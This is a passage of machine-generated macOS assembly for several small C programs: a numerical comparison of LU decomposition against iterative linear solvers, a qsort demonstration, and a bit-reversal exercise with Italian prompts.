VectSub LCPI12_0: .quad 0x7fffffffffffffff ## double NaN .quad 0x7fffffffffffffff ## double NaN .section __TEXT,__text,regular,pure_instructions .globl _VectSub .p2align 4, 0x90 _VectSub: ## @VectSub .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movl %edx, -20(%rbp) movslq -20(%rbp), %rdi shlq $3, %rdi callq _malloc movq %rax, -32(%rbp) movl $0, -24(%rbp) LBB12_1: ## =>This Inner Loop Header: Depth=1 movl -24(%rbp), %eax cmpl -20(%rbp), %eax jge LBB12_4 ## %bb.2: ## in Loop: Header=BB12_1 Depth=1 movq -8(%rbp), %rax movslq -24(%rbp), %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -16(%rbp), %rax movslq -24(%rbp), %rcx subsd (%rax,%rcx,8), %xmm0 movaps LCPI12_0(%rip), %xmm1 ## xmm1 = [NaN,NaN] pand %xmm1, %xmm0 movq -32(%rbp), %rax movslq -24(%rbp), %rcx movsd %xmm0, (%rax,%rcx,8) ## %bb.3: ## in Loop: Header=BB12_1 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB12_1 LBB12_4: movq -32(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _PrintMatrix ## -- Begin function PrintMatrix .p2align 4, 0x90 _PrintMatrix: ## @PrintMatrix .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movl %edx, -20(%rbp) movl $0, -24(%rbp) LBB13_1: ## =>This Loop Header: Depth=1 ## Child Loop BB13_3 Depth 2 movl -24(%rbp), %eax cmpl -20(%rbp), %eax jge LBB13_8 ## %bb.2: ## in Loop: Header=BB13_1 Depth=1 movl $0, -28(%rbp) LBB13_3: ## Parent Loop BB13_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -28(%rbp), %eax cmpl -20(%rbp), %eax jge LBB13_6 ## %bb.4: ## in Loop: Header=BB13_3 Depth=2 movq -8(%rbp), %rdi movq -16(%rbp), %rax movl -24(%rbp), %ecx imull -20(%rbp), %ecx addl -28(%rbp), %ecx movslq %ecx, %rcx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero leaq L_.str(%rip), %rsi movb $1, %al callq _fprintf ## %bb.5: ## in Loop: Header=BB13_3 Depth=2 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB13_3 LBB13_6: ## in Loop: Header=BB13_1 Depth=1 movq -8(%rbp), %rdi leaq L_.str.1(%rip), %rsi movb $0, %al callq _fprintf ## %bb.7: ## in Loop: Header=BB13_1 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB13_1 LBB13_8: movq -8(%rbp), %rdi leaq l_.str.2(%rip), %rsi movb $0, %al callq _fprintf movq -8(%rbp), %rdi xorl %eax, %eax movl %eax, %esi xorl %edx, %edx callq _fseek addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function main LCPI14_0: .quad 0x3d06849b86a12b9b ## double 9.9999999999999999E-15 LCPI14_1: .quad 0x3d3c25c268497682 ## double 1.0E-13 LCPI14_2: .quad 0x3ff0000000000000 ## double 1 LCPI14_3: .quad 0x4024000000000000 ## double 10 LCPI14_4: .quad 0x40c3880000000000 ## double 1.0E+4 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $144, %rsp movl $0, -4(%rbp) movsd LCPI14_0(%rip), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -80(%rbp) leaq L_.str.3(%rip), %rdi leaq L_.str.4(%rip), %rsi callq _fopen movq %rax, -112(%rbp) movl $0, -92(%rbp) LBB14_1: ## =>This Loop Header: Depth=1 ## Child Loop BB14_6 Depth 2 ## Child Loop BB14_10 Depth 2 ## Child Loop BB14_14 Depth 2 ## Child Loop BB14_18 Depth 2 ## Child Loop BB14_22 Depth 2 ## Child Loop BB14_26 Depth 2 cmpl $3000, -92(%rbp) ## imm = 0xBB8 jae LBB14_31 ## %bb.2: ## in Loop: Header=BB14_1 Depth=1 movl $12, %edi callq _CreateMatrix movq %rax, -16(%rbp) movl $12, %edi callq _CreateVector movq %rax, -32(%rbp) movq -16(%rbp), %rdi movq -32(%rbp), %rsi movl $12, %edx callq _MatrixMul movq %rax, -24(%rbp) movq -16(%rbp), %rdi movl $12, %esi callq _GetCond movsd %xmm0, -104(%rbp) xorps %xmm0, %xmm0 ucomisd -104(%rbp), %xmm0 jae LBB14_4 ## %bb.3: ## in Loop: Header=BB14_1 Depth=1 movsd -104(%rbp), %xmm0 ## xmm0 = mem[0],zero movsd LCPI14_4(%rip), %xmm1 ## xmm1 = mem[0],zero ucomisd %xmm1, %xmm0 jb LBB14_5 LBB14_4: ## in Loop: Header=BB14_1 Depth=1 jmp LBB14_30 LBB14_5: ## in Loop: Header=BB14_1 Depth=1 movq -112(%rbp), %rdi movsd -104(%rbp), %xmm0 ## xmm0 = mem[0],zero leaq L_.str.5(%rip), %rsi movb $1, %al callq _fprintf movq _luOps1@GOTPCREL(%rip), %rax movl $0, (%rax) movq _luOps2@GOTPCREL(%rip), %rax movl $0, (%rax) movl $144, %edi movl $8, %esi callq _calloc movq %rax, -48(%rbp) movl $144, %edi movl $8, %esi callq _calloc movq %rax, -56(%rbp) movq -16(%rbp), %rdi movl $12, %esi leaq -48(%rbp), %rdx leaq -56(%rbp), %rcx callq _CreateLUMatrix movq -48(%rbp), %rdi movq -56(%rbp), %rsi movq -24(%rbp), %rcx movl $12, %edx callq _Solution movq %rax, -40(%rbp) movq -48(%rbp), %rdi callq _free movq -56(%rbp), %rdi callq _free movq -112(%rbp), %rax movq %rax, -120(%rbp) ## 8-byte Spill movq -32(%rbp), %rdi movq -40(%rbp), %rsi movl $12, %edx callq _VectSub movq %rax, %rdi movl $12, %esi callq _FindNorm movq -120(%rbp), %rdi ## 8-byte Reload leaq L_.str.6(%rip), %rsi movb $1, %al callq _fprintf movq -40(%rbp), %rdi callq _free movq _itOps1@GOTPCREL(%rip), %rax movl $0, (%rax) movq _itOps2@GOTPCREL(%rip), %rax movl $0, (%rax) movq -16(%rbp), %rdi movl $12, %esi callq _CreateAlphaMatrix movq %rax, -64(%rbp) movq -24(%rbp), %rdi movq -16(%rbp), %rsi movl $12, %edx callq _CreateBetaVector movq %rax, -72(%rbp) movl $12, %edi movl $8, %esi callq _calloc movq %rax, -40(%rbp) movl $0, -84(%rbp) LBB14_6: ## Parent Loop BB14_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $12, -84(%rbp) jae LBB14_9 ## %bb.7: ## in Loop: Header=BB14_6 Depth=2 movq -72(%rbp), %rax movl -84(%rbp), %ecx ## kill: def $rcx killed $ecx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -40(%rbp), %rax movl -84(%rbp), %ecx ## kill: def $rcx killed $ecx movsd %xmm0, (%rax,%rcx,8) ## %bb.8: ## in Loop: Header=BB14_6 Depth=2 movl -84(%rbp), %eax addl $1, %eax movl %eax, -84(%rbp) jmp LBB14_6 LBB14_9: ## in Loop: Header=BB14_1 Depth=1 movl $0, -84(%rbp) LBB14_10: ## Parent Loop BB14_1 Depth=1 ## => This Inner Loop Header: Depth=2 movq _itOps2@GOTPCREL(%rip), %rax movl (%rax), %eax movq _luOps2@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax ja LBB14_13 ## %bb.11: ## in Loop: Header=BB14_10 Depth=2 movq -72(%rbp), %rdi movq -64(%rbp), %rsi movq -40(%rbp), %rdx movl $12, %ecx callq _CreateXVector movq %rax, -40(%rbp) ## %bb.12: ## in Loop: Header=BB14_10 Depth=2 movl -84(%rbp), %eax addl $1, %eax movl %eax, -84(%rbp) jmp LBB14_10 LBB14_13: ## in Loop: Header=BB14_1 Depth=1 movq -112(%rbp), %rax movq %rax, -128(%rbp) ## 8-byte Spill movq -32(%rbp), %rdi movq -40(%rbp), %rsi movl $12, %edx callq _VectSub movq %rax, %rdi movl $12, %esi callq _FindNorm movq -128(%rbp), %rdi ## 8-byte Reload leaq L_.str.6(%rip), %rsi movb $1, %al callq _fprintf movq -64(%rbp), %rdi callq _free movq -72(%rbp), %rdi callq _free movq _itOps1@GOTPCREL(%rip), %rax movl $0, (%rax) movq _itOps2@GOTPCREL(%rip), %rax movl $0, (%rax) movq -16(%rbp), %rdi movl $12, %esi callq _CreateAlphaMatrix movq %rax, -64(%rbp) movq -24(%rbp), %rdi movq -16(%rbp), %rsi movl $12, %edx callq _CreateBetaVector movq %rax, -72(%rbp) movl $12, %edi movl $8, %esi callq _calloc movq %rax, -40(%rbp) movl $0, -84(%rbp) LBB14_14: ## Parent Loop BB14_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $12, -84(%rbp) jae LBB14_17 ## %bb.15: ## in Loop: Header=BB14_14 Depth=2 movq -72(%rbp), %rax movl -84(%rbp), %ecx ## kill: def $rcx killed $ecx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -40(%rbp), %rax movl -84(%rbp), %ecx ## kill: def $rcx killed $ecx movsd %xmm0, (%rax,%rcx,8) ## %bb.16: ## in Loop: Header=BB14_14 Depth=2 movl -84(%rbp), %eax addl $1, %eax movl %eax, -84(%rbp) jmp LBB14_14 LBB14_17: ## in Loop: Header=BB14_1 Depth=1 movl $0, -84(%rbp) LBB14_18: ## Parent Loop BB14_1 Depth=1 ## => This Inner Loop Header: Depth=2 movq _itOps2@GOTPCREL(%rip), %rax movl (%rax), %eax movq _luOps2@GOTPCREL(%rip), %rcx movl (%rcx), %ecx shrl $1, %ecx cmpl %ecx, %eax ja LBB14_21 ## %bb.19: ## in Loop: Header=BB14_18 Depth=2 movq -72(%rbp), %rdi movq -64(%rbp), %rsi movq -40(%rbp), %rdx movl $12, %ecx callq _CreateXVector movq %rax, -40(%rbp) ## %bb.20: ## in Loop: Header=BB14_18 Depth=2 movl -84(%rbp), %eax addl $1, %eax movl %eax, -84(%rbp) jmp LBB14_18 LBB14_21: ## in Loop: Header=BB14_1 Depth=1 movq -112(%rbp), %rax movq %rax, -136(%rbp) ## 8-byte Spill movq -32(%rbp), %rdi movq -40(%rbp), %rsi movl $12, %edx callq _VectSub movq %rax, %rdi movl $12, %esi callq _FindNorm movq -136(%rbp), %rdi ## 8-byte Reload leaq L_.str.6(%rip), %rsi movb $1, %al callq _fprintf movq -64(%rbp), %rdi callq _free movq -72(%rbp), %rdi callq _free movq _itOps1@GOTPCREL(%rip), %rax movl $0, (%rax) movq _itOps2@GOTPCREL(%rip), %rax movl $0, (%rax) movq -16(%rbp), %rdi movl $12, %esi callq _CreateAlphaMatrix movq %rax, -64(%rbp) movq -24(%rbp), %rdi movq -16(%rbp), %rsi movl $12, %edx callq _CreateBetaVector movq %rax, -72(%rbp) movl $12, %edi movl $8, %esi callq _calloc movq %rax, -40(%rbp) movl $0, -84(%rbp) LBB14_22: ## Parent Loop BB14_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $12, -84(%rbp) jae LBB14_25 ## %bb.23: ## in Loop: Header=BB14_22 Depth=2 movq -72(%rbp), %rax movl -84(%rbp), %ecx ## kill: def $rcx killed $ecx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -40(%rbp), %rax movl -84(%rbp), %ecx ## kill: def $rcx killed $ecx movsd %xmm0, (%rax,%rcx,8) ## %bb.24: ## in Loop: Header=BB14_22 Depth=2 movl -84(%rbp), %eax addl $1, %eax movl %eax, -84(%rbp) jmp LBB14_22 LBB14_25: ## in Loop: Header=BB14_1 Depth=1 movl $0, -84(%rbp) LBB14_26: ## Parent Loop BB14_1 Depth=1 ## => This Inner Loop Header: Depth=2 movq _itOps2@GOTPCREL(%rip), %rax movl (%rax), %eax movq _luOps2@GOTPCREL(%rip), %rcx movl (%rcx), %ecx shll $1, %ecx cmpl %ecx, %eax ja LBB14_29 ## %bb.27: ## in Loop: Header=BB14_26 Depth=2 movq -72(%rbp), %rdi movq -64(%rbp), %rsi movq -40(%rbp), %rdx movl $12, %ecx callq _CreateXVector movq %rax, -40(%rbp) ## %bb.28: ## in Loop: Header=BB14_26 Depth=2 movl -84(%rbp), %eax addl $1, %eax movl %eax, -84(%rbp) jmp LBB14_26 LBB14_29: ## in Loop: Header=BB14_1 Depth=1 movq -112(%rbp), %rax movq %rax, -144(%rbp) ## 8-byte Spill movq -32(%rbp), %rdi movq -40(%rbp), %rsi movl $12, %edx callq _VectSub movq %rax, %rdi movl $12, %esi callq _FindNorm movq -144(%rbp), %rdi ## 8-byte Reload leaq L_.str.7(%rip), %rsi movb $1, %al callq _fprintf movq -64(%rbp), %rdi callq _free movq -72(%rbp), %rdi callq _free movq -16(%rbp), %rdi callq _free movq -24(%rbp), %rdi callq _free movq -32(%rbp), %rdi callq _free movq -40(%rbp), %rdi callq _free LBB14_30: ## in Loop: Header=BB14_1 Depth=1 movl -92(%rbp), %eax addl $1, %eax movl %eax, -92(%rbp) jmp LBB14_1 LBB14_31: movq -112(%rbp), %rdi callq _fclose leaq L_.str.8(%rip), %rdi leaq L_.str.4(%rip), %rsi callq _fopen movq %rax, -112(%rbp) movsd LCPI14_1(%rip), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -80(%rbp) LBB14_32: ## =>This Loop Header: Depth=1 ## Child Loop BB14_34 Depth 2 ## Child Loop BB14_38 Depth 2 movsd LCPI14_2(%rip), %xmm0 ## xmm0 = mem[0],zero ucomisd -80(%rbp), %xmm0 jbe LBB14_43 ## %bb.33: ## in Loop: Header=BB14_32 Depth=1 movl $12, %edi callq _CreateMatrix movq %rax, -16(%rbp) movl $12, %edi callq _CreateVector movq %rax, -32(%rbp) movq -16(%rbp), %rdi movq -32(%rbp), %rsi movl $12, %edx callq _MatrixMul movq %rax, -24(%rbp) movq -16(%rbp), %rdi movl $12, %esi callq _GetCond movsd %xmm0, -104(%rbp) movq -112(%rbp), %rdi movsd -80(%rbp), %xmm0 ## xmm0 = mem[0],zero leaq L_.str.9(%rip), %rsi movb $1, %al callq _fprintf movq _luOps1@GOTPCREL(%rip), %rax movl $0, (%rax) movq _luOps2@GOTPCREL(%rip), %rax movl $0, (%rax) movl $144, %edi movl $8, %esi callq _calloc movq %rax, -48(%rbp) movl $144, %edi movl $8, %esi callq _calloc movq %rax, -56(%rbp) movq -16(%rbp), %rdi movl $12, %esi leaq -48(%rbp), %rdx leaq -56(%rbp), %rcx callq _CreateLUMatrix movq -48(%rbp), %rdi movq -56(%rbp), %rsi movq -24(%rbp), %rcx movl $12, %edx callq _Solution movq %rax, -40(%rbp) movq -48(%rbp), %rdi callq _free movq -56(%rbp), %rdi callq _free movq -40(%rbp), %rdi callq _free movq -112(%rbp), %rdi movq _luOps1@GOTPCREL(%rip), %rax movl (%rax), %edx movq _luOps2@GOTPCREL(%rip), %rax movl (%rax), %ecx leaq L_.str.10(%rip), %rsi movb $0, %al callq _fprintf movq _itOps1@GOTPCREL(%rip), %rax movl $0, (%rax) movq _itOps2@GOTPCREL(%rip), %rax movl $0, (%rax) movq -16(%rbp), %rdi movl $12, %esi callq _CreateAlphaMatrix movq %rax, -64(%rbp) movq -24(%rbp), %rdi movq -16(%rbp), %rsi movl $12, %edx callq _CreateBetaVector movq %rax, -72(%rbp) movl $12, %edi movl $8, %esi callq _calloc movq %rax, -40(%rbp) movl $0, -84(%rbp) LBB14_34: ## Parent Loop BB14_32 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $12, -84(%rbp) jae LBB14_37 ## %bb.35: ## in Loop: Header=BB14_34 Depth=2 movq -72(%rbp), %rax movl -84(%rbp), %ecx ## kill: def $rcx killed $ecx movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movq -40(%rbp), %rax movl -84(%rbp), %ecx ## kill: def $rcx killed $ecx movsd %xmm0, (%rax,%rcx,8) ## %bb.36: ## in Loop: Header=BB14_34 Depth=2 movl -84(%rbp), %eax addl $1, %eax movl %eax, -84(%rbp) jmp LBB14_34 LBB14_37: ## in Loop: Header=BB14_32 Depth=1 movl $0, -84(%rbp) LBB14_38: ## Parent Loop BB14_32 Depth=1 ## => This Inner Loop Header: Depth=2 movq -32(%rbp), %rdi movq -40(%rbp), %rsi movl $12, %edx callq _VectSub movq %rax, %rdi movl $12, %esi callq _FindNorm ucomisd -80(%rbp), %xmm0 jbe LBB14_41 ## %bb.39: ## in Loop: Header=BB14_38 Depth=2 movq -72(%rbp), %rdi movq -64(%rbp), %rsi movq -40(%rbp), %rdx movl $12, %ecx callq _CreateXVector movq %rax, -40(%rbp) ## %bb.40: ## in Loop: Header=BB14_38 Depth=2 movl -84(%rbp), %eax addl $1, %eax movl %eax, -84(%rbp) jmp LBB14_38 LBB14_41: ## in Loop: Header=BB14_32 Depth=1 movq -112(%rbp), %rdi movq _itOps1@GOTPCREL(%rip), %rax movl (%rax), %edx movq _itOps2@GOTPCREL(%rip), %rax movl (%rax), %ecx leaq L_.str.11(%rip), %rsi movb $0, %al callq _fprintf movq -64(%rbp), %rdi callq _free movq -72(%rbp), %rdi callq _free movq -16(%rbp), %rdi callq _free movq -24(%rbp), %rdi callq _free movq -32(%rbp), %rdi callq _free movq -40(%rbp), %rdi callq _free ## %bb.42: ## in Loop: Header=BB14_32 Depth=1 movsd LCPI14_3(%rip), %xmm0 ## xmm0 = mem[0],zero mulsd -80(%rbp), %xmm0 movsd %xmm0, -80(%rbp) jmp LBB14_32 LBB14_43: movq -112(%rbp), %rdi callq _fclose xorl %eax, %eax addq $144, %rsp popq %rbp retq .cfi_endproc ## -- End function .comm _luOps2,4,2 ## @luOps2 .comm _luOps1,4,2 ## @luOps1 .comm _itOps2,4,2 ## @itOps2 .comm _itOps1,4,2 ## @itOps1 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%lf " L_.str.1: ## @.str.1 .asciz "\n" .section __TEXT,__const l_.str.2: ## @.str.2 .space 2 .section __TEXT,__cstring,cstring_literals L_.str.3: ## @.str.3 .asciz "../output1.txt" L_.str.4: ## @.str.4 .asciz "w" L_.str.5: ## @.str.5 .asciz "%.30lf " L_.str.6: ## @.str.6 .asciz "%.15lf " L_.str.7: ## @.str.7 .asciz "%.15lf\n" L_.str.8: ## @.str.8 .asciz "../output2.txt" L_.str.9: ## @.str.9 .asciz "%.13lf " L_.str.10: ## @.str.10 .asciz "%i %i " L_.str.11: ## @.str.11 .asciz "%i %i\n" .subsections_via_symbols
the_stack_data/138159.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _compare ; -- Begin function compare .p2align 2 _compare: ; @compare .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] str x1, [sp] ldr x8, [sp, #8] ldr w8, [x8] ldr x9, [sp] ldr w9, [x9] subs w0, w8, w9 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #28] adrp x8, l___const.main.values@PAGE add x8, x8, l___const.main.values@PAGEOFF ldr q0, [x8] add x0, sp, #32 str q0, [sp, #32] ldr x8, [x8, #16] str x8, [sp, #48] mov w8, #6 str w8, [sp, #20] ldrsw x1, [sp, #20] mov x2, #4 adrp x3, _compare@PAGE add x3, x3, _compare@PAGEOFF bl _qsort str wzr, [sp, #24] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #24] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_4 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldrsw x9, [sp, #24] add x8, sp, #32 ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB1_1 LBB1_4: ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: bl ___stack_chk_fail LBB1_6: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__const .p2align 2 ; @__const.main.values l___const.main.values: .long 40 ; 0x28 .long 10 ; 0xa .long 100 ; 0x64 .long 90 ; 0x5a .long 20 ; 0x14 .long 25 ; 0x19 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d " .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _compare ## -- Begin function compare .p2align 4, 0x90 _compare: ## @compare .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -8(%rbp), %rax movl (%rax), %eax movq -16(%rbp), %rcx subl (%rcx), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -36(%rbp) movq l___const.main.values(%rip), %rax movq %rax, -32(%rbp) movq l___const.main.values+8(%rip), %rax movq %rax, -24(%rbp) movq l___const.main.values+16(%rip), %rax movq %rax, -16(%rbp) movl $6, -44(%rbp) leaq -32(%rbp), %rdi movslq -44(%rbp), %rsi movl $4, %edx leaq _compare(%rip), %rcx callq _qsort movl $0, -40(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -40(%rbp), %eax cmpl -44(%rbp), %eax jge LBB1_4 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movslq -40(%rbp), %rax movl -32(%rbp,%rax,4), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 movl -40(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) jmp LBB1_1 LBB1_4: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB1_6 ## %bb.5: xorl %eax, %eax addq $48, %rsp popq %rbp retq LBB1_6: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__const .p2align 4 ## @__const.main.values l___const.main.values: .long 40 ## 0x28 .long 10 ## 0xa .long 100 ## 0x64 .long 90 ## 0x5a .long 20 ## 0x14 .long 25 ## 0x19 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d " .subsections_via_symbols
the_stack_data/151017.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp sub x8, x29, #24 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldur x8, [x29, #-24] mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldur x8, [x29, #-24] stur x8, [x29, #-32] stur xzr, [x29, #-40] stur wzr, [x29, #-44] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-32] and x8, x8, #0x1 str x8, [sp, #40] ldur x8, [x29, #-32] lsr x8, x8, #1 stur x8, [x29, #-32] ldur x8, [x29, #-40] lsl x8, x8, #1 stur x8, [x29, #-40] ldr x9, [sp, #40] ldur x8, [x29, #-40] orr x8, x8, x9 stur x8, [x29, #-40] ldur w8, [x29, #-44] add w8, w8, #1 stur w8, [x29, #-44] ldr x12, [sp, #40] ldur x11, [x29, #-32] ldur x10, [x29, #-40] ldur w9, [x29, #-44] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x12, [x9] str x11, [x9, #8] str x10, [x9, #16] str x8, [x9, #24] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur x8, [x29, #-32] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB0_1 b LBB0_3 LBB0_3: b LBB0_4 LBB0_4: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-44] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_4 Depth=1 ldur x8, [x29, #-40] and x8, x8, #0x1 str x8, [sp, #32] ldur x8, [x29, #-40] lsr x8, x8, #1 stur x8, [x29, #-40] ldr x8, [sp, #32] mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldur w8, [x29, #-44] subs w8, w8, #1 stur w8, [x29, #-44] b LBB0_4 LBB0_6: adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Immetti un numero intero non negativo: " l_.str.1: ; @.str.1 .asciz "%llu" l_.str.2: ; @.str.2 .asciz "n = %llu \n" l_.str.3: ; @.str.3 .asciz "LSB = %llu, copia = %llu, reverse = %llu, nBits = %d \n" l_.str.4: ; @.str.4 .asciz "\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -24(%rbp), %rsi movb $0, %al callq _scanf movq -24(%rbp), %rsi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movq -24(%rbp), %rax movq %rax, -32(%rbp) movq $0, -40(%rbp) movl $0, -44(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movq -32(%rbp), %rax andq $1, %rax movq %rax, -56(%rbp) movq -32(%rbp), %rax shrq $1, %rax movq %rax, -32(%rbp) movq -40(%rbp), %rax shlq $1, %rax movq %rax, -40(%rbp) movq -56(%rbp), %rax orq -40(%rbp), %rax movq %rax, -40(%rbp) movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) movq -56(%rbp), %rsi movq -32(%rbp), %rdx movq -40(%rbp), %rcx movl -44(%rbp), %r8d leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 cmpq $0, -32(%rbp) jne LBB0_1 ## %bb.3: jmp LBB0_4 LBB0_4: ## =>This Inner Loop Header: Depth=1 cmpl $0, -44(%rbp) jle LBB0_6 ## %bb.5: ## in Loop: Header=BB0_4 Depth=1 movq -40(%rbp), %rax andq $1, %rax movq %rax, -64(%rbp) movq -40(%rbp), %rax shrq $1, %rax movq %rax, -40(%rbp) movq -64(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl -44(%rbp), %eax addl $-1, %eax movl %eax, -44(%rbp) jmp LBB0_4 LBB0_6: leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $64, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Immetti un numero intero non negativo: " L_.str.1: ## @.str.1 .asciz "%llu" L_.str.2: ## @.str.2 .asciz "n = %llu \n" L_.str.3: ## @.str.3 .asciz "LSB = %llu, copia = %llu, reverse = %llu, nBits = %d \n" L_.str.4: ## @.str.4 .asciz "\n" .subsections_via_symbols
